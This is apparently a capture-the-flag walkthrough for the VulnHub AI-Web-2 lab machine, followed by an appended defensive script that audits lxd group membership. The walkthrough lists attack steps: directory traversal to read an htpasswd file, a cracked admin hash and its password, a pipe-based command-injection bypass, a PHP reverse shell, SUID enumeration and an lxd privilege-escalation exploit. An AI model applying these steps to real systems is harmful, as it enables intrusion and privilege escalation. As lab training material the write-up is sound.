Target VM download link:
https://www.vulnhub.com/entry/ai-web-2,357
Host port scan:
SQL injection attempts found no injection vulnerability, so register an account to get in:
http://10.10.202.160/userpage.php
Searching the vulnerability database:
XuezhuLi FileSharing - Directory Traversal
https://www.exploit-db.com/exploits/40009
Next, brute-force the directories:
╰─ sudo python3 dirsearch.py -u http://10.10.202.160/ -e php
We tried using the file inclusion to look at the Apache authentication file:
aiweb2admin:$apr1$VXqmVvDD$otU1gx4nwCgsAOA7Wi.aU/
╰─ john --wordlist=/usr/share/wordlists/rockyou.txt htpwd
aiweb2admin: c.ronaldo
After trying &&, ; and |, we find that the command execution restriction can be bypassed with |
Visit: http://10.10.202.160/webadmin/H05Tpin9555/php-reverse.php
Then carry out the privilege escalation:
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/null
n0nr00tuser@aiweb2host:/tmp$ ./LinEnum.sh
╰─ searchsploit lxd
Create a hack.sh file and copy the script content from the following link into it:
https://www.exploit-db.com/exploits/46978
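The lxd exploit linked above only works for an account that is a member of the lxd group, so auditing that membership is the matching defensive check. The following is an added example, not part of the original write-up: the function names group_members and demo and the sample accounts are assumptions constructed for illustration. It lists the non-root accounts in a group, including those that hold it only as their primary GID.

```shell
#!/bin/sh
# Added example: list every non-root account that belongs to a group
# (default: lxd), either as a supplementary member in the group file or
# by having that group as its primary GID in the passwd file.
# Usage: group_members GROUP_FILE PASSWD_FILE [GROUP]
group_members() {
    group_file=$1
    passwd_file=$2
    target=${3:-lxd}
    awk -F: -v target="$target" '
        # Pass 1: group database (name:passwd:gid:member,member,...)
        pass == 1 {
            if ($1 == target) {
                gid = $3
                n = split($4, m, ",")
                for (i = 1; i <= n; i++)
                    if (m[i] != "" && m[i] != "root") seen[m[i]] = 1
            }
            next
        }
        # Pass 2: passwd database (name:x:uid:gid:...). Accounts whose
        # primary GID is the target group never appear in the member list.
        pass == 2 && gid != "" && $4 == gid && $1 != "root" { seen[$1] = 1 }
        END { for (u in seen) print u }
    ' pass=1 "$group_file" pass=2 "$passwd_file" | sort
}

# Constructed sample data (hypothetical accounts, not taken from the VM).
demo() {
    tmp=$(mktemp -d)
    printf '%s\n' 'root:x:0:' 'lxd:x:108:root,alice' \
        'www-data:x:33:' > "$tmp/group"
    printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
        'alice:x:1001:1001::/home/alice:/bin/bash' \
        'builder:x:1002:108::/home/builder:/bin/sh' \
        'carol:x:1003:1003::/home/carol:/bin/sh' > "$tmp/passwd"
    group_members "$tmp/group" "$tmp/passwd" "${1:-lxd}"
    rm -rf "$tmp"
}
```

On a live host, run group_members /etc/group /etc/passwd and remove any account that does not need to manage containers.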
OVER !!